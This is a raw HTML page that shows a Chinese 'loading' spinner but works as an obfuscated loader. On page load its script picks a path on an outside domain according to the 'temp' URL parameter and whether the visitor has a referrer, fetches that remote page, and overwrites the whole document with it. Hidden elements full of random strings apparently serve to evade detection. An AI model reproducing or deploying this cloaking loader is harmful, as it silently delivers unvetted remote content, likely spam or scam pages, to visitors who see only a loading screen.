<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hVX66yi1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hVX66yi1 .czNxfZMqZPq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hVX66yi1 .content {
            line-height: 50px;
            text-align: center
        }

        .hVX66yi1 .img {
            width: 100%
        }

        .hVX66yi1 .uqGo1jvD {
            text-align: center
        }

        .hVX66yi1 .uqGo1jvD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hVX66yi1 .uqGo1jvD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hVX66yi1 .uqGo1jvD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hVX66yi1 .uqGo1jvD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hVX66yi1 .uqGo1jvD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hVX66yi1 .uqGo1jvD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hVX66yi1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aKvCOne17J4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cMGwjuP = aKvCOne17J4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cMGwjuP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cMGwjuP +".html?a=share";
		}
		
        MCq4acu9Ow=url+"#"+new Date().getTime();
        MCq4acu9Ow && function() {
            $.get(MCq4acu9Ow, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>bG2HdGCSBSIgJu6ZTl3aMHjjTlGyK4AyFIHo23phuQHRHRPi6fNdF4Hcq1lFPlva2zC4EC</a>
<h1 style='display:none' >SZ13Kvx7t0qogUOGSZmqPi0UrGJ2o316dhotbnp7ibVXjy5tCEa3alsMbiXW2HdGlc4RX</h1>
<a  href='#' style='display:none'>bG2HdGCSBSIgJu6ZTl3aMHjjTlGyK4AyFIHo23phuQHRHRPi6fNdF4Hcq1lFPlva2zC4EC</a>
<a  href='#' style='display:none'>bG2HdGCSBSIgJu6ZTl3aMHjjTlGyK4AyFIHo23phuQHRHRPi6fNdF4Hcq1lFPlva2zC4EC</a><div class="hVX66yi1">
    <div class="czNxfZMqZPq">
        <div class="uqGo1jvD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>jHfNhmpet81B60dfCFjBm6cyf4pjlrMDw4uUocwIrt6pm5fBVpc2ufHoYq18g</p>
<ul style='display:none' >ytF4PtzCCRtQPRZU5qGCzV3DbgfRGEHM4dCvQGff0yvL3KqhyV8seLTz0yzYSuZLdcSu5HICuukidqKTRIeQYv</ul>
<span style='display:none'>Lrc2yu09Po1jWc0ePm4uxCFQtRwVlw6IABGpOkRgleIEkZDTwQ7yotTWCCBukM0qwW</span>
<img  src='' style='display:none'></body>
</html>